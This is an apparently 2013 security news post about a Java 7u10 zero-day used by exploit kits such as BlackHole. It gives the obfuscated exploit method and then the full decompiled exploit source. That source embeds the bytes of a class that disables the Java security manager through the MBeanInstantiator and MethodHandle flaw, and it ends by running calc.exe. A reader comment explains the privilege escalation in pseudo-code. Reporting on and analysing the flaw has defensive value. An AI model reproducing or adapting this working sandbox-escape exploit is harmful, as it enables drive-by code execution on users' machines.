New Java 0-day Exploit in the Wild – Update 4

According to Kafeine Security a new exploit for Java 7 is in the wild. Not surprisingly this new exploit, announced yesterday on the underweb, comes right after the BlackHole crew announced that their team has been given a budget of 100.000$ to acquire unique web browser exploits. Currently the exploit has been reported to work up to the latest version of Java, that is: Java 1.7.0_10. As usual we suggest to immediately disable java on your browser, since the exploit has got hundreds of thousands of hits in just two days. Currently we don’t have yet a sample to analyze but we’ll publish an update as soon as we’ll be able to gather more information on the topic.

Update 1: according to AlienVault the exploit is highly obfuscated and seems to target security checks as seen last year on CVE-2012-4681. Also the exploit seems to be bundled with Nuclear Pack EK too.

Update 2: the exploit has been fully disclosed, according to Spiderlab the exploit uses a technique similar to CVE-2012-5088 by using java.lang.invoke.MethodHandle.InvokeWithArguments() and taking advantage of the MBeanInstantiator which returns a reference to a restricted class called by a trusted object. The core of the exploit is represented by the following method:

public ewjvaiwebvhtuai124a(String paramString)
    throws Throwable
  {
    try
    {
      byte[] arrayOfByte = ewjvaiwebvhtuai124f(test.ewjvaiwebvhtuai124a(ewjvaiwebvhtuai124b, "") + test.ewjvaiwebvhtuai124a(ewjvaiwebvhtuai124a, ""));
      JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
      JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
      MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
      Class localClass1 = localMBeanInstantiator.findClass(ewjvaiwebvhtuai124c(var_666c[1]), null);
      Class localClass2 = localMBeanInstantiator.findClass(ewjvaiwebvhtuai124c(var_666c[5]), null);
      MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
      MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
      MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, ewjvaiwebvhtuai124c(var_666c[3]), localMethodType1);
      MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
      MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
      Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
      MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
      MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, ewjvaiwebvhtuai124c(var_666c[4]), localMethodType3);
      MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
      MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, ewjvaiwebvhtuai124c(var_666c[0]), localMethodType4 });
      Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
      MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { [B.class });
      MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, ewjvaiwebvhtuai124c(var_666c[2]), localMethodType5 });
      Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
      localClass3.newInstance();
      Method localMethod = localClass3.getMethod("r", new Class[] { String.class, Class.class });
      localMethod.invoke(null, new Object[] { paramString, hw.class });
    }
    catch (Exception localException)
    {
    }
  }

Update 3: the following exploit kits are confirmed to use this exploit: BlackHole, Cool EK, Nuclear Pack, RedKit, Sakura

Update 4: Full source code is now publicly available:

/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
 */

import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

@SuppressWarnings({ "restriction" })
public class Exploit {

  public static byte[] hex2Byte(String paramString) {
		byte[] arrayOfByte = new byte[paramString.length() / 2];
		for (int i = 0; i < arrayOfByte.length; i++) {
			arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
		}
		return arrayOfByte;
	}

	public static byte[] B$class_bytes = hex2Byte("CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017");

	// Decompilation credit to benmmurphy
	// http://www.reddit.com/r/netsec/comments/16b4n1/0day_exploit_fo_java_17u10_spotted_in_the_wild/c7ulpd7
  // basically, it's this, as if this were compiled and saved on disk.
	static class B implements PrivilegedExceptionAction<Object> {
		public B() {
			try {
				AccessController.doPrivileged(this);
			} catch (Exception e) {
			}
		}

		public Object run() {
			// This basically removes the security manager
			System.setSecurityManager(null);
			return new Object();
		}
	}

	@SuppressWarnings("rawtypes")
	public void init() {
		try {
			// ================================================================
			// STEP 0: get introspection objects

			// Conveniences
			ClassLoader null_ClassLoader = null;
			Object[] _zero_args_ = {};

			// "Returns a lookup object which is trusted minimally.
			// It can only be used to create method handles to publicly
			// accessible fields and methods."
			MethodHandles.Lookup lookup = MethodHandles.publicLookup();

			// Used to load the "sun.org.mozilla.javascript.internal.*" classes
			// Looks like these classes load some normally inaccessible
			// libraries. Can't find any good documentation on them.
			MBeanInstantiator localMBeanInstantiator = ((JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("",
					null, null)).getMBeanInstantiator();

			// Used to invoke reflection on the javascript classes
			// method type: MethodHandle <method> (Class, String, MethodType)
			MethodType mt_MethodHandle__Class_String_MethodType = MethodType.methodType(MethodHandle.class,
					Class.class, new Class[] { String.class, MethodType.class });

			// MethodHandles.Lookup.findVirtual(Class, String, MethodType)
			MethodHandle MethodHandles$Lookup$findVirtual = lookup.findVirtual(MethodHandles.Lookup.class,
					"findVirtual", mt_MethodHandle__Class_String_MethodType);

			// method type: MethodHandle <method> (Class, MethodType)
			MethodType mt_MethodHandle__Class_MethodType = MethodType.methodType(MethodHandle.class, Class.class,
					new Class[] { MethodType.class });

			// MethodHandles.Lookup.findConstructor(Class, MethodType)
			MethodHandle MethodHandles$Lookup$findConstructor = lookup.findVirtual(MethodHandles.Lookup.class,
					"findConstructor", mt_MethodHandle__Class_MethodType);

			// ================================================================
			// STEP 1: Load the GeneratedClassLoader interface that declares a
			// public
			// "defineClass" method so we can take our bytes and turn it into a
			// live Java Class.
			Class GeneratedClassLoader$class = localMBeanInstantiator.findClass(
					"sun.org.mozilla.javascript.internal.GeneratedClassLoader", null_ClassLoader);

			// ================================================================
			// STEP 2: Create a Javascript "Context" to get a reference to a
			// Javascript GeneratedClassLoader via
			// "Context.createClassLoader(ClassLoader)".
			Class Context$class = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context",
					null_ClassLoader);
			MethodType mt_Void__Void = MethodType.methodType(Void.TYPE);
			MethodHandle Context$Context = (MethodHandle) MethodHandles$Lookup$findConstructor
					.invokeWithArguments(new Object[] { lookup, Context$class, mt_Void__Void });
			Object jsContext = Context$Context.invokeWithArguments(_zero_args_);

			// ================================================================
			// STEP 3: Create a GeneratedClassLoader object.
			MethodType mt_GeneratedClassLoader__ClassLoader = MethodType.methodType(GeneratedClassLoader$class,
					ClassLoader.class);
			MethodHandle Context$createClassLoader = (MethodHandle) MethodHandles$Lookup$findVirtual
					.invokeWithArguments(new Object[] { lookup, Context$class, "createClassLoader",
							mt_GeneratedClassLoader__ClassLoader });
			Object generatedClassLoader = Context$createClassLoader
					.invokeWithArguments(new Object[] { jsContext, null });

			// ================================================================
			// STEP 4: Define the class "B" - the bytes "B$class_bytes" is
			// basically what you would get "on disk" if you compiled the "B"
			// class.
			MethodType mt_Class__String_bytearray = MethodType.methodType(Class.class, String.class,
					new Class[] { byte[].class });
			MethodHandle GeneratedClassLoader$defineClass = (MethodHandle) MethodHandles$Lookup$findVirtual
					.invokeWithArguments(new Object[] { lookup, GeneratedClassLoader$class, "defineClass",
							mt_Class__String_bytearray });
			Class B$class = (Class) GeneratedClassLoader$defineClass.invokeWithArguments(new Object[] {
					generatedClassLoader, null, B$class_bytes });

			// ================================================================
			// STEP 5: Create a new "B" object, which disables the security manager in it's constructor
			B$class.newInstance();

			// ================================================================
			// PROFIT!!!1!
			Runtime.getRuntime().exec("calc.exe");
		} catch (Throwable ex) {
		}
	}

}

Comments

  1. I think this source is almost old: into Rhinos class of openjdk 7 the method createClassLoader into Context there isn’t, and Context is not into sun.org.mozilla.javascript.internal package.

    I’m not sure but the program can disable the security manager with B class in this way:
    JMX Server instance a Context with hight jvm privilege,(just like JMX Server?), from Context get a ClassLoader to load B, and B disable SecurityManager.
    A pseudo java code:

    Object jsContext = JMX.instance(Context.class);
    GeneratedClassLoader gcl = jsContext.createClassLoader();
    Class B$class = gcl.defineClass(B_Serialized);
    B$class.newInstance(); //bye bye security manager!

    Methods java source:
    [in Context] public GeneratedClassLoader createClassLoader(ClassLoader parent){
    ContextFactory f = getFactory();
    return f.createClassLoader(parent);
    }

    createClassLoader(ClassLoader parent)
    {
    return new DefiningClassLoader(parent);
    }

    [DefiningClassLoader extends ClassLoader] defineClass:
    {
    return super.defineClass(name, data, 0, data.length,
    SecurityUtilities.getProtectionDomain(getClass()));
    }

    As you can see into defineClass: the ProtectionDomain of Context,so of MBeanServer, has highter privilege, over that of an applet has into JVM.

    Source